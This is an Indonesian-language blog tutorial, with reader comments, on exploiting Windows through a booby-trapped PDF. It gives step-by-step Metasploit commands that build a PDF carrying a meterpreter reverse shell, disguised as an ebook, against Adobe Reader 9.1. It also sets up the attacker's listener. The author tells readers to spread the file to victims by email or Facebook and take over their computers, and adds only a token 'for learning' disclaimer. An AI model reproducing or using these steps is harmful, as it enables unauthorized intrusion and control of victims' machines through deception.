Haii bro, kali ini saya akan memberikan tutorial mengenai Cara Exploit Windows Menggunakan PDF dengan Metasploit, Apa itu Metasploit? Metasploit merupakan sebuah tools penetration testing yang sangat berbahaya, dengan metasploit kita bisa masuk bahkan dapat menguasai sistem orang lain, namun agar bisa masuk ke sistem orang lain menggunakan metasploit tidak mudah, untuk itu kita harus memebuat backdoor yang digunakan untuk jalan masuk ke sistem korban.

nah untuk menyamarkan backdor tersebut pada tutorial ini saya membuat backdoor dengan format file .pdf
oke langsung saja simak langkah-langkahnya :

Tested :  Windows 7 Ultimate 32bit
Vulnerable Application Testing : Adobe Reader 9.1

pertama jalankan terlebih dahulu service postgresql dan metasploit
service postgresql start
service metasploit start
service postgresql start

Selanjutnya buka metasploit, dengan perintah
msfconsole
msfconsole

 setelah metasploit terbuka ketikkan perintah di bawah ini satu satu-persatu
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
set payload windows/meterpreter/reverse_tcp
set filename Ebook_Hacking.pdf
set lhost 192.168.1.106
set lport 443
exploit
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Keterangan:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs --> Type exploit yang digunakan
set payload windows/meterpreter/reverse_tcp --> Mengatur payload yang di gunakan ke sebuah target ketika shell sudah terpasang
set filename Ebook_Hacking.pdf --> Nama file backdor, buat semenarik mungkin agar korban penasaran untuk membukanya
set lhost 192.168.1.106 --> Ip Attacker, isi sesuai dengan IP anda
set lport 443 --> Port Listener, saya menggunakan port 443 karena selalu terbuka
exploit --> Perintah untuk menghasilkan file PDF (backdoor)

Setelah berhasil menghasilkan PDF, file PDF akan tersimpan di folder /root/.msf4/local/(nama pdf). folder .msf4 ini biasanya tersembunyi, untuk memunculkan .msf4 kalian tinggal tekan keyborad CTRL+H

tahap diatas adalah pembuatan backdoor, selanjutnya kita jalankan exploit, ketikkan perintah berikut pada terminal
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 443
set lhost 192.168.1.106 (sesuaikan ip kalian)
exploit
set payload windows/meterpreter/reverse_tcp

Sekarang kalian sebarkan file pdf(backdoor) yang dibuat tadi melaui email, faceebook, dll terserah bagaimana caranya agar korban membuka file pdf(backdoor) tersebut

Meterpreter sessions opened

meterpreter sessions opened :D, itu tandanya kita sudah masuk ke sistem korban, apabila sudah sampai tahap ini terserah kalian mau diapain komputer korban :D, untuk perintah-perintah meterpreter yang lain kalian bisa cari sendiri di google.

sekian dulu tutorial kali ini mengenai Exploit Windows Menggunakan PDF dengan Metasploit semoga bermanfaat, tutorial ini saya buat hanya untuk pembelajaran saja, apabila ada penyalahgunaan dari tutorial ini itu diluar tanggung jawab saya, gunakan ilmu dengan bijak.

Posting Komentar

  1. gan
    kalo file pdf nya diedit
    exploit nya hilang ga ?

    BalasHapus
  2. Permisi min mau nanya nih
    Setelah ane eksekusi exploit kok gk muncul stage nya dan meterpreter pun gk kebuka :(
    Ada saran/solusi gk gan ??
    MOHON PENCERAHANNYA GAN ^_^

    BalasHapus
  3. Target menggunakan Adobe Reader versi brp mas?
    bisa di baca lagi di atas, exploit ini vuln di Adobe reader v.9.1

    BalasHapus
  4. misi gan, ane coba malah backdor ketika didownload keterang di msf nya malah "OpenSSL : : SSL : : SSLError SSL_Accept SYSCall returned=5 errno=0 state=SSLv2/v3 read client hello A"

    dan file backdor nya ngga bisa kedownload gan.. ane testing di windows 10..

    mohon pencerahannya gan..

    BalasHapus
  5. bukannya yg no_js cuma work di win xp ya vroh ?

    BalasHapus
  6. Permisi gan..
    Ini untuk file pdf yang di buka di windows kan?
    Kalau di android gimana ya? Jadi file pdfnya di injek listener. Kemudian di buka di anroid dan langsung listener buka sesi.
    Terimakasih gan

    BalasHapus

 
Top